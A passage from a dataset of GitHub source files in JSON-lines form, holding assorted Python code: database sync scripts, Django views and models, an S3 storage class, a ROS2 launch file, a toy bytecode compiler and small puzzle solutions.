Jos_CBFields).join(Jos_Users).filter(\n Jos_Users.username == username).one()\n return registrymember, joomlamember\n\n\ndef set_field_invisible(joomlasession, joomlamember, joomlafield):\n \"\"\"Set the field invisible on the profile page.\"\"\"\n\n userid = joomlamember.user.id\n fieldid = joomlasession.query(Jos_Fields).filter(\n Jos_Fields.name == joomlafield).one().fieldid\n\n # If privacy rule already exists.\n if joomlasession.query(Jos_Privacy).filter(\n Jos_Privacy.userid == userid).filter(\n Jos_Privacy.xid == fieldid).count() == 0:\n #####\n # Oursql gives an error when adding a privacyrule the normal way\n # https://bugs.launchpad.net/oursql/+bug/805983\n # privacyrule = Jos_Privacy(user = joomlamember.user, type=\"field\",\n # field = field, rule = NOT_VISIBLE)\n # joomlasession.add(privacyrule)\n # joomlasession.commit()\n #\n # Workaround is to execute a convetional SQL insert statement.\n #####\n ins = Jos_Privacy.__table__.insert().values(userid = joomlamember.user.id,\n type=\"field\", xid = fieldid, rule = NOT_VISIBLE)\n joomlasession.connection().execute(ins)\n\n\ndef copy_fields_to_joomla(joomlasession, registrysession, username):\n \"\"\"Copy fields to homepage from members registry for given user.\n\n Also sets the field invisible on the profile page.\n\n Returns True if succesful.\"\"\"\n\n try:\n registrymember, joomlamember = get_members(\n joomlasession, registrysession, username)\n except sqlalchemy.orm.exc.NoResultFound as e:\n print(\"User %s not found\" % username)\n return False\n\n # Copy email field.\n mail = 'email'\n setattr(joomlamember.user, mail,\n getattr(registrymember.contactinfo, 'email_fld'))\n set_field_invisible(joomlasession, joomlamember, mail)\n\n # Copy rest of fields.\n for joomlafield, registryfield in COMPROFDICT.items():\n registryvalue = None\n if hasattr(registrymember, registryfield):\n registryvalue = getattr(registrymember, registryfield)\n else:\n registryvalue = getattr(registrymember.contactinfo, registryfield)\n\n setattr(joomlamember, joomlafield, registryvalue)\n set_field_invisible(joomlasession, joomlamember, joomlafield)\n registrymember.lastsync_fld = datetime.datetime.now()\n\n return True\n\n\ndef copy_fields_to_registry(joomlasession, registrysession, username):\n \"\"\"Copy fields to members registry from homepage for given user.\n\n Returns True if succesful.\"\"\"\n\n try:\n registrymember, joomlamember = get_members(\n joomlasession, registrysession, username)\n except sqlalchemy.orm.exc.NoResultFound as e:\n print(\"User %s not found\" % username)\n return False\n\n # Copy email field.\n mail = 'email_fld'\n setattr(registrymember.contactinfo, mail,\n getattr(joomlamember.user, 'email'))\n\n # Copy rest of fields.\n for joomlafield, registryfield in COMPROFDICT.items():\n joomlavalue = getattr(joomlamember, joomlafield)\n setattr(registrymember.contactinfo, registryfield, joomlavalue)\n\n return True\n\ndef get_usernames(joomlasession):\n \"\"\"Get list of usernames on the homepage.\"\"\"\n users = joomlasession.query(Jos_Users).all()\n return [user.username for user in users]\n\ndef get_dirty_from_registry(registrysession):\n \"\"\"Get query with the members to be synced to the homepage\"\"\"\n dirtymembersquery = registrysession.query(Member).join(\n ContactInformation).filter(or_(\n Member.lastsync_fld < Member.modified_fld,\n Member.lastsync_fld < ContactInformation.modified_fld))\n return dirtymembersquery\n\ndef sync_databases(joomlasession, registrysession):\n \"\"\"Sync the member contactinfo fields between the homepage and\n member.registry\"\"\"\n synced_joomla, synced_registry = 0, 0\n usernames = get_usernames(joomlasession)\n\n registrydirtyquery = get_dirty_from_registry(registrysession)\n\n for username in usernames:\n # If member with username must be synced.\n if registrydirtyquery.filter(\n Member.username_fld == username).count() == 1:\n if copy_fields_to_joomla(joomlasession, registrysession, username):\n synced_joomla += 1\n else:\n if copy_fields_to_registry(joomlasession, registrysession,\n username):\n synced_registry += 1\n\n print(\"Synced %d users to homepage\" % synced_joomla)\n print(\"Synced %d users to members registry\" % synced_registry)\n\n\ndef main():\n JoomlaSessionMaker = connect.connect('joomla',\n 'joomla', 'mysql.teknolog.fi', 'joomla', 'mysql+oursql',\n create_metadata=False)\n joomlasession = JoomlaSessionMaker()\n\n RegistrySessionMaker = connect.connect('members',\n 'members', 'postgre.teknolog.fi', 'members')\n registrysession = RegistrySessionMaker()\n\n sync_databases(joomlasession, registrysession)\n registrysession.commit()\n joomlasession.commit()\n\n return 0\n\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n","repo_name":"Teknologforeningen/svaksvat","sub_path":"joomlasync/joomlasync.py","file_name":"joomlasync.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"7527418756","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom usuario.models import Usuario,Profissional\nfrom avaliacao.models import Avaliacao\nfrom django.contrib.auth.decorators import login_required\nfrom .form import AvaliacaoForm\nfrom django.db.models import Avg\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\n@login_required(login_url='usuario:submit_login')\ndef avaliacao(request,id):\n usuario = Usuario.objects.get(id=id)\n profissional = Profissional.objects.get(user=usuario)\n\n if request.method == 'POST':\n form = AvaliacaoForm(request.POST)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.user = request.user\n obj.save()\n messages.success(request, 'Avaliação realizada com Sucesso!')\n return redirect('avaliacao:clientelistarAvaliacoes', id)\n else:\n form = AvaliacaoForm()\n context = {\n 'form': form,\n 'profissional': profissional\n }\n return render(request, 'avaliacao.html', context)\n\ndef listarAvaliacao(request):\n usuario = Usuario.objects.get(id=request.user.id)\n avaliacao = Avaliacao.objects.filter(profissional_id=usuario).order_by('-id')\n paginator = Paginator(avaliacao, 3)\n page = request.GET.get('p')\n avaliacao = paginator.get_page(page)\n total_pessoas = Avaliacao.objects.filter(profissional_id=usuario).count()\n media = Avaliacao.objects.filter(profissional_id=usuario).aggregate(avg_rating=Avg('nota'))\n context = {\n 'avaliacao': avaliacao,\n 'total_pessoas': total_pessoas,\n 'media':media\n }\n\n return render(request, 'listarAvaliacao.html', context)\n\n\ndef clientelistarAvaliacoes(request,id):\n usuario = Usuario.objects.get(id=id)\n avaliacao = Avaliacao.objects.filter(profissional_id=usuario).order_by('-id')\n paginator = Paginator(avaliacao, 3)\n page = request.GET.get('p')\n avaliacao = paginator.get_page(page)\n total_pessoas = Avaliacao.objects.filter(profissional_id=usuario).count()\n media = Avaliacao.objects.filter(profissional_id=usuario).aggregate(avg_rating=Avg('nota'))\n context = {\n 'avaliacao':avaliacao,\n 'total_pessoas': total_pessoas,\n 'media': media\n\n }\n return render(request, 'clientelistarAvaliacoes.html', context)\n\n","repo_name":"CimaraOliveira/projetoWorkBook","sub_path":"avaliacao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"29348518375","text":"import time\n\nimport torch\n\nfrom inference import plot_image_from_output\nfrom torchvision import io\nfrom torchvision.transforms import transforms\n\n\ndef predict_image(model, img_path, device):\n image = io.imread(img_path)\n trs = transforms.ToTensor()\n image = trs(image)\n org_image = image\n my_shape = list(image.shape)\n my_shape.insert(0, 1)\n image = image.reshape(my_shape)\n image = image.to(device)\n with torch.no_grad():\n model.eval()\n start = time.time()\n img_pred = model(image)\n stop = time.time()\n print('Labels: ', img_pred[0]['labels'])\n model.train()\n print(f'Predict time: {stop - start}s \\n')\n plot_image_from_output(org_image, img_pred)\n","repo_name":"hoanshiro/CS406","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"44807039156","text":"from lxml import html\nfrom cssselect import GenericTranslator, SelectorError\n\npage = open(\"watch-history.html\", \"r\")\ndoc = html.document_fromstring(page.read())\nsel = doc.xpath(\"//div/a[contains(@href, 'watch')]\")\ncsel = doc.xpath(\"//div/a\")\nselection = []\n\nfor i in sel:\n # if not \"Watched\" in str(i):\n print(str(i.text))\n selection.append(str(i.text))\n\nprint(selection)\nprint(len(selection), len(csel)/2)\n\n\n","repo_name":"skuzzymiglet/old-projects","sub_path":"youtube_analyzer/v2/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"4243821681","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom ndingest.settings.settings import Settings\nsettings = Settings.load()\nimport hashlib\nimport boto3\nimport botocore\nfrom ndingest.util.util import Util\nUtilClass = Util.load()\n\n\nclass CuboidBucket:\n\n def __init__(self, project_name, region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Create resource for the cuboid queue\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n self.project_name = project_name\n self.s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n try:\n self.bucket = self.s3.Bucket(bucket_name)\n except botocore.exceptions.ClientError as e:\n print (e)\n raise\n\n @staticmethod\n def createBucket(region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Create the cuboid bucket\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n bucket = s3.Bucket(bucket_name)\n try:\n # creating the bucket\n response = bucket.create(\n ACL = 'private'\n )\n except Exception as e:\n print (e)\n raise\n\n @staticmethod\n def deleteBucket(region_name=settings.REGION_NAME, endpoint_url=settings.S3_ENDPOINT):\n \"\"\"Delete the cuboid bucket\"\"\"\n \n bucket_name = CuboidBucket.getBucketName()\n s3 = boto3.resource(\n 's3', region_name=region_name, endpoint_url=endpoint_url,\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY)\n bucket = s3.Bucket(bucket_name)\n try:\n # deleting the bucket\n response = bucket.delete()\n except Exception as e:\n print (e)\n raise\n \n @staticmethod\n def getBucketName():\n \"\"\"Generate the Bucket Name\"\"\"\n return settings.S3_CUBOID_BUCKET\n \n\n def putObject(self, channel_name, resolution, morton_index, time_index, cube_data, neariso=False):\n \"\"\"Put object in the cuboid bucket.\n\n Not supported by the Boss. Use putObjectByKey() instead.\n \"\"\"\n supercuboid_key = self.generateSupercuboidKey(channel_name, resolution, morton_index, time_index, neariso=neariso)\n return self.putObjectByKey(supercuboid_key, cube_data)\n \n def putObjectByKey(self, supercuboid_key, cube_data):\n \"\"\"Put object in the cuboid bucket by key\"\"\"\n \n try:\n response = self.bucket.put_object(\n ACL = 'private',\n Body = cube_data,\n Key = supercuboid_key,\n StorageClass = 'STANDARD'\n )\n return response\n except Exception as e:\n print (e)\n raise\n \n def getObjectByKey(self, supercuboid_key):\n \"\"\"Get an object from the cuboid bucket based on key. \"\"\"\n \n try:\n s3_obj = self.s3.Object(self.bucket.name, supercuboid_key)\n response = s3_obj.get()\n return response['Body'].read()\n except Exception as e:\n # print (e)\n raise\n\n def getObject(self, channel_name, resolution, morton_index, time_index, neariso=False):\n \"\"\"Get object from the cuboid bucket based on parameters.\n\n Not supported by the Boss. Use getObjectByKey() instead.\n \"\"\"\n\n supercuboid_key = self.generateSupercuboidKey(channel_name, resolution, morton_index, time_index, neariso=neariso)\n return self.getObjectByKey(supercuboid_key)\n\n def generateSupercuboidKey(self, channel_name, resolution, morton_index, time_index, neariso=False):\n \"\"\"Generate the supercuboid key\"\"\"\n return UtilClass.generateCuboidKey(self.project_name, channel_name, resolution, morton_index, time_index, neariso=neariso)\n\n def deleteObject(self, supercuboid_key):\n \"\"\"Delete object from the upload bucket\"\"\"\n \n try:\n s3_obj = self.s3.Object(self.bucket.name, supercuboid_key)\n response = s3_obj.delete()\n return response\n except Exception as e:\n print (e)\n raise\n\n def getAllObjects(self):\n \"\"\"Get a collection of ObjectSummary for all objects in the bucket.\"\"\"\n\n try:\n return self.bucket.objects.all()\n except Exception as e:\n print (e)\n raise\n","repo_name":"neurodata/ndingest","sub_path":"ndbucket/cuboidbucket.py","file_name":"cuboidbucket.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"70030439658","text":"import yaml\nfrom pprint import pprint as print\nfrom os import popen, system, getcwd,path\nfrom logger import logger\n\n__CMD_BOB_QUERY_SRC_PATH__ = \"CONFIG_JNN=1 bob query-path -f {{src}} -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_QUERY_BUILD_PATH__ = \"CONFIG_JNN=1 bob query-path -f {{build}} -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_SHOW__ = \"CONFIG_JNN=1 bob show --format=yaml -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_QUERY_RECIPE__ = \"CONFIG_JNN=1 bob query-recipe -DCONFIG_JNN=1 {module}\"\n__CMD_BOB_BUILD__ = \"CONFIG_JNN=1 bob dev -DCONFIG_JNN=1 -DCMAKE_EXPORT_COMPILE_COMMANDS=1 {module}\"\n__CMD_BOB_CLEAN_BUILD__ = \"CONFIG_JNN=1 bob dev --clean -DCONFIG_JNN=1 -DCMAKE_EXPORT_COMPILE_COMMANDS=1 {module}\"\n\n\ndef os_popen(cmd_string):\n logger.debug(\"cmd:{}\".format(cmd_string))\n return popen(cmd_string)\n\n\nclass BobPackage:\n def __init__(self, name, level, cache, **kawrgs):\n self.name = name\n self.kwargs = kawrgs\n\n self.__level = level\n self.sub_pkgs = list()\n\n self.__cache = cache\n cache_pkg = cache.get(self.name)\n self.__info = cache_pkg.get('info') if isinstance(\n cache_pkg, dict) else None\n self.__deps = cache_pkg.get('depends') if isinstance(\n cache_pkg, dict) else None\n self.__yaml = cache_pkg.get('yaml') if isinstance(\n cache_pkg, dict) else None\n self.__src = cache_pkg.get('src') if isinstance(\n cache_pkg, dict) else None\n self.__build = cache_pkg.get('build') if isinstance(\n cache_pkg, dict) else None\n\n def get_info(self):\n if self.__info is None:\n cmd_string = __CMD_BOB_SHOW__.format(module=self.name)\n self.__info = yaml.full_load(os_popen(cmd_string))\n return self.__info\n\n def get_depends(self):\n if self.__deps is None:\n self.__deps = self.get_info().get('depends')\n logger.debug(\"SubModuls: {}\".format(self.__deps))\n return self.__deps\n\n def get_yaml(self):\n\n if self.__yaml is None:\n cmd_string = __CMD_BOB_QUERY_RECIPE__.format(module=self.name)\n recpie_files_list = os_popen(cmd_string).readlines()\n for i in recpie_files_list:\n if self.__yaml is None and i.startswith('recipes'):\n self.__yaml = i.strip('\\n')\n logger.debug(self.__yaml)\n return self.__yaml\n\n def get_build_dir(self):\n \n if self.__build is None or self.__build =='':\n try:\n cmd_string = __CMD_BOB_QUERY_BUILD_PATH__.format(\n module=self.name)\n work_dir_str = os_popen(cmd_string).readlines()\n work_dir_str = work_dir_str[0].strip('\\n')\n self.__build = work_dir_str\n except Exception as e:\n logger.error(\n \"Get build dir Failed for with error:'{}'\".format(str(e)))\n finally:\n logger.debug(\"build {}\".format(self.__build))\n return self.__build\n\n def get_src_dir(self):\n if self.__src is None:\n try:\n cmd_string = __CMD_BOB_QUERY_SRC_PATH__.format(\n module=self.name)\n work_dir_str = os_popen(cmd_string).readlines()\n work_dir_str = work_dir_str[0].strip('\\n')\n self.__src = work_dir_str\n\n except Exception as e:\n logger.error(\n \"Get src dir Failed for with error:'{}'\".format(str(e)))\n self.__src = ''\n pass\n\n logger.debug(\"src_dir {}\".format(self.__src))\n return self.__src\n\n def build_package(self,pattern=__CMD_BOB_BUILD__):\n print(self.kwargs)\n if self.kwargs.get('build_depends') == True and self.__level >= 0:\n if isinstance(self.get_build_dir(), str):\n getcwd()\n if not path.exists(path.join( getcwd(), self.get_build_dir(), 'compile_commands.json')):\n cmd_string = pattern.format(module=self.name)\n print(cmd_string)\n system(cmd_string)\n\n def dump(self):\n ret = {self.name: {'name': self.name,\n 'info': self.get_info(),\n 'depends': self.get_depends(),\n 'yaml': self.get_yaml(),\n 'src': self.get_src_dir(),\n 'build': self.get_build_dir()}}\n\n return ret\n\n def process_subpackages(self):\n if (self.__level > 0):\n print(\"package {} depends {}\".format(\n self.name, self.get_depends()))\n depends = self.get_depends()\n if depends is not None:\n for pkt_name in depends:\n sub_pkt = BobPackage(\n pkt_name, self.__level-1, self.__cache, **self.kwargs)\n sub_pkt.process()\n sub_pkt.build_package(__CMD_BOB_CLEAN_BUILD__)\n self.sub_pkgs.append(sub_pkt)\n\n def process(self):\n print(\"processing package:{}\".format(self.name))\n self.get_info()\n self.get_depends()\n self.get_yaml()\n self.get_src_dir()\n self.get_build_dir()\n self.__cache.update(**self.dump())\n self.process_subpackages()\n","repo_name":"dllvhaobo/working-in-wsl","sub_path":"tools/ClangdGen/BobPackage.py","file_name":"BobPackage.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37359373421","text":"n, s = int(input()), input()\nk, r = 0, []\nfor i in range(1, n + 1):\n p = s[i:] + s[:i]\n for j in range(n // 2):\n if p[j] != p[-j - 1]:\n break\n else:\n k += 1\n r.append(i)\nprint(k)\nfor m in r:\n print(m)\n","repo_name":"sosnovskiim/Informatics","sub_path":"olimp_27_10_22/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18336758739","text":"import math\nA, B = map(int, input().split())\n\ndef gcd(A, B):\n if A < B:\n A, B = B, A\n while B > 0:\n temp = A % B\n A = B\n B = temp\n return A\n\ngcd_num = gcd(A, B)\n\ndef prime(a):\n max_a = 1 + int(math.sqrt(a))\n d = dict()\n d[1] = 1\n i = 2\n while a != 1:\n if i > max_a:\n d[a] = 1\n break\n if a % i == 0:\n a = a // i\n if i in d:\n d[i] += 1\n else:\n d[i] = 1\n else:\n i += 1\n return d\nd = prime(gcd_num) \n\nprint(len(d))","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02900/s634406192.py","file_name":"s634406192.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10240259469","text":"import os\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription, GroupAction\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import ThisLaunchFileDir\nfrom launch_ros.actions import Node\nfrom launch_ros.actions import PushRosNamespace\n\ndef generate_launch_description():\n\n aimbot_pkg = 'aimbot_pkg'\n td_node_name = 'target_detection_node'\n target_detection_launch = 'target_detection.launch.py'\n\n nav_package = 'ucsd_robocar_nav2_pkg'\n all_components_launch = 'all_components.launch.py'\n\n ld = LaunchDescription()\n\n components_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(\n get_package_share_directory(nav_package),\n 'launch',\n all_components_launch)\n )\n )\n\n # target_detection_node = Node(\n # package=aimbot_pkg,\n # executable=td_node_name,\n # output='screen',\n # )\n\n target_detection_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n os.path.join(\n get_package_share_directory(aimbot_pkg),\n 'launch',\n target_detection_launch)\n )\n )\n\n\n ld.add_action(components_launch)\n ld.add_action(target_detection_launch)\n\n return ld\n\n\n\n","repo_name":"aksharans/ucsd148team6","sub_path":"launch/target_detection.launch.py","file_name":"target_detection.launch.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18185155719","text":"from functools import reduce\n\nN, K = map(int, input().split())\nA = list(map(int, input().split()))\nAp = [a for a in A if a>0]\nAm = [a for a in A if a<0]\nmod = 10**9+7\nif len(Ap) + len(Am) < K:\n print(0)\n exit()\nif len(Ap) + len(Am) == K:\n if 0 in A and len(Am) % 2:\n print(0)\n else:\n ans = reduce(lambda a, b: a * b % mod, Ap+Am, 1)\n print(ans)\n exit()\nAp.sort(reverse=True)\nAm.sort()\nif len(Ap) == 0:\n if K%2:\n if 0 in A:\n ans = 0\n else:\n ans = reduce(lambda a, b: a*b%mod, Am[-K:], 1)\n else:\n ans = reduce(lambda a, b: a*b%mod, Am[:K], 1)\n print(ans)\n exit()\n\nidx_Am = 0\nn = 0\nans = 1\nfor idx_Ap, ap in enumerate(Ap+[0]):\n while idx_Am < len(Am) and n < K and -Am[idx_Am] > ap:\n ans = ans * Am[idx_Am] % mod\n idx_Am += 1\n n += 1\n if n == K:\n break\n n += 1\n idx_Ap += 1\n ans = ans * ap % mod\n if n == K:\n break\nelse:\n assert False\nif idx_Am % 2 == 0:\n print(ans)\nelse:\n if idx_Ap == len(Ap) or (idx_Am != len(Am) and idx_Ap > 0 and Am[idx_Am] * Am[idx_Am-1] > Ap[idx_Ap] * Ap[idx_Ap-1]):\n ans = ans * Am[idx_Am] * pow(Ap[idx_Ap-1], mod-2, mod) % mod\n else:\n ans = ans * Ap[idx_Ap] * pow(Am[idx_Am-1], mod-2, mod) % mod\n print(ans)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02616/s877070483.py","file_name":"s877070483.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"70881392936","text":"def prepare_form (document, vip_name_title, pax, country, flight, date, time):\n vip_country_table = document.tables[0]\n row = vip_country_table.rows[1]\n vip_name_title_cell = row.cells[0]\n country_cell = row.cells[2]\n\n flight_info_table = document.tables[1]\n row = flight_info_table.rows[1]\n date_cell = row.cells[2]\n time_cell = row.cells[4]\n flight_cell = row.cells[6]\n\n if pax != \"0\":\n vip_name_title_cell.text = vip_name_title +\" + \" + pax + \" Pax.\"\n else:\n vip_name_title_cell.text = vip_name_title\n\n country_cell.text = country\n country_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n date_cell.text = date\n date_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n time_cell.text = time\n time_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n flight_cell.text = flight\n flight_cell.paragraphs[0].alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n\ndef add_drivers(document, limo_df):\n limo_table = document.tables[3]\n\n if len(limo_df) > 15:\n print(\"There are more than 15 limousines in the list. Which is not allowed GVA \\nPlease check the list and try again.\")\n exit()\n\n for i in range(0, len(limo_df)):\n row = limo_table.rows[i+1]\n limo_cell = row.cells[0]\n driver_cell = row.cells[1]\n limo_cell.text = limo_df.iloc[i, 0]\n driver_cell.text = limo_df.iloc[i, 1]\n\n \n","repo_name":"Dany-Drgh/wordFormFiller","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"262065005","text":"import contextlib\nimport logging\nimport pathlib\nimport uuid\nimport tempfile\nfrom PIL import Image\n\nfrom app.core.config import settings\nfrom app.core.emails import EmailSender\nfrom app.data_access.models import Place\nfrom app.data_access.unit_of_work import UnitOfWork\n\n\nclass ImageStorage:\n def __init__(self, unit_of_work: UnitOfWork, email_sender: EmailSender) -> None:\n self.__uow = unit_of_work\n self.__email_sender = email_sender\n self.__logger = logging.getLogger(self.__class__.__name__)\n\n def store_place_image(self, place: Place, content: bytes) -> None:\n try:\n with tempfile.TemporaryFile() as file:\n file.write(content)\n image = Image.open(file)\n\n except IOError:\n self.__logger.error(\"Invalid image\")\n self.__email_sender.notify_invalid_image(place)\n\n else:\n self.__store_image(place, content, image.format if image.format else \"jpg\")\n\n def __store_image(self, place: Place, content: bytes, image_format: str) -> None:\n output_filename = f\"place_image_{place.id}_{uuid.uuid4()}.{image_format}\"\n output_path = (\n pathlib.Path(settings.STATICFILES_DIR)\n .joinpath(\"uploads\")\n .joinpath(output_filename)\n )\n output_path.write_bytes(content)\n place.image = f\"{settings.STATIC_URL}/uploads/{output_filename}\"\n self.__uow.commit()\n self.__uow.index(place)\n","repo_name":"xlurio/gee","sub_path":"app/storage/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71695411177","text":"import os\nimport sys\n\n\nargs = sys.argv\n\ndef wb(byte):\n try:\n f = open(\"out.chexc\", \"ab\")\n f.write(byte)\n f.close()\n except:\n print(\"something went wrong during the writing process\")\n sys.exit(1)\ndef ewerr(err, errcode, line):\n print(\"CHex compile error on line \" + str(line) + \":\" + err)\n sys.exit(errcode)\ndef create_file(filename):\n f = open(filename, \"w\")\n f.close()\n \ntry:\n filler = args[1]\nexcept:\n print(\"No args given\")\n sys.exit(1)\n\ntry:\n f = open(args[1], \"r\")\n lines = f.readlines()\n f.close()\nexcept:\n ewerr(\"Missing file\", 2, 0)\nlinenum = 0\ncreate_file(\"out.chexc\")\nwb(b'hi')\nfor line in lines:\n linenum += 1\n split = line.split()\n # comments\n if line == \"\" or line.startswith(\";\"):\n pass\n # print\n elif line.startswith(\"pr \"):\n if not len(split) == 2:\n ewerr(\"Wrong args\", 5, linenum)\n try:\n hext = b'\\x01' + bytes([int(split[1])])\n except:\n ewerr(\"Can't convert decimal to hex\", 4, linenum)\n wb(hext)\n # jump\n elif line.startswith(\"jmp \"):\n if not len(split) == 2:\n ewerr(\"Wrong args\", 5, linenum)\n try:\n hext = b'\\x02' + bytes([int(split[1])])\n except:\n ewerr(\"Can't convert decimal to hex\", 4, linenum)\n wb(hext)\n # store\n elif line.startswith(\"str \"):\n if not len(split) == 3:\n ewerr(\"Wrong args\", 5, linenum)\n try:\n hext = b'\\x03' + bytes([int(split[1])]) + bytes([int(split[2])])\n except:\n ewerr(\"Can't convert decimal to hex\", 4, linenum)\n wb(hext)\n # jump to place in stroed memory\n elif line.startswith(\"jmpmem \"):\n if not len(split) == 2:\n ewerr(\"Wrong args\", 5, linenum)\n try:\n hext = b'\\x04' + bytes([int(split[1])])\n except:\n ewerr(\"Can't convert decimal to hex\", 4, linenum)\n wb(hext)\n # jump if equal\n elif line.startswith(\"jmpeq \"):\n if not len(split) == 4:\n ewerr(\"Wrong args\", 5, linenum)\n try:\n hext = b'\\x05' + bytes([int(split[1])]) + bytes([int(split[2])]) + bytes([int(split[3])])\n except:\n ewerr(\"Can't convert decimal to hex\", 4, linenum)\n wb(hext)\n else:\n ewerr(\"Unkown command\", 10, linenum)\n \n \n","repo_name":"Ccode-archives/CHex","sub_path":"chexcomp.py","file_name":"chexcomp.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"73062855976","text":"from django.db import models\n\n\nclass Player(models.Model):\n sofifa_id = models.IntegerField(\n db_column='nb_sofifa_id',\n null=False,\n verbose_name='Sofifa id'\n )\n player_url = models.CharField(\n db_column='tx_player_url',\n verbose_name='Player url',\n max_length=128,\n null=False\n )\n short_name = models.CharField(\n db_column='tx_short_name',\n verbose_name='Short name',\n max_length=64,\n null=False\n )\n long_name = models.CharField(\n db_column='tx_long_name',\n verbose_name='Long name',\n max_length=64,\n null=False\n )\n age = models.IntegerField(\n db_column='nb_agr',\n null=False,\n verbose_name='Age'\n )\n nationality = models.CharField(\n db_column='tx_nationality',\n verbose_name='Nationality',\n max_length=64,\n null=False\n )\n club_name = models.CharField(\n db_column='tx_club_name',\n verbose_name='Club name',\n max_length=64,\n null=False\n )\n league_name = models.CharField(\n db_column='tx_league_name',\n verbose_name='League name',\n max_length=64,\n null=False\n )\n overall = models.IntegerField(\n db_column='nb_overall',\n null=False,\n verbose_name='Overall'\n )\n potential = models.IntegerField(\n db_column='nb_potential',\n null=False,\n verbose_name='Potential'\n )\n\n class Meta:\n managed = True\n db_table = 'player'\n verbose_name = 'Player'\n verbose_name_plural = 'Players'\n","repo_name":"limahgustavo/sofifa-core","sub_path":"api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18058550869","text":"def game():\n\ts1 = input()\n\ts2 = input()\n\ts3 = input()\n\tx = s1[0]\n\twhile len(s1)>=0 and len(s2)>=0 and len(s3)>=0:\n\t\tif x=='a':\n\t\t\tif len(s1)==0:\n\t\t\t\tprint(\"A\")\n\t\t\t\treturn\n\t\t\tx = s1[0]\n\t\t\ts1 = s1[1:]\n\t\tif x=='b':\n\t\t\tif len(s2)==0:\n\t\t\t\tprint(\"B\")\n\t\t\t\treturn\n\t\t\tx = s2[0]\n\t\t\ts2 = s2[1:]\n\t\tif x=='c':\n\t\t\tif len(s3)==0:\n\t\t\t\tprint(\"C\")\n\t\t\t\treturn\n\t\t\tx = s3[0]\n\t\t\ts3 = s3[1:]\n\t\t\ngame()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03998/s100832975.py","file_name":"s100832975.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"16918491128","text":"import argparse\r\nfrom playwright.sync_api import sync_playwright\r\nimport time\r\nimport secrets\r\n\r\n\r\ndef screenshot(website: str, headless: bool = True, delay: int = 0, full: bool = False):\r\n with sync_playwright() as playwright:\r\n browser = playwright.chromium.launch(headless=headless)\r\n page = browser.new_page()\r\n 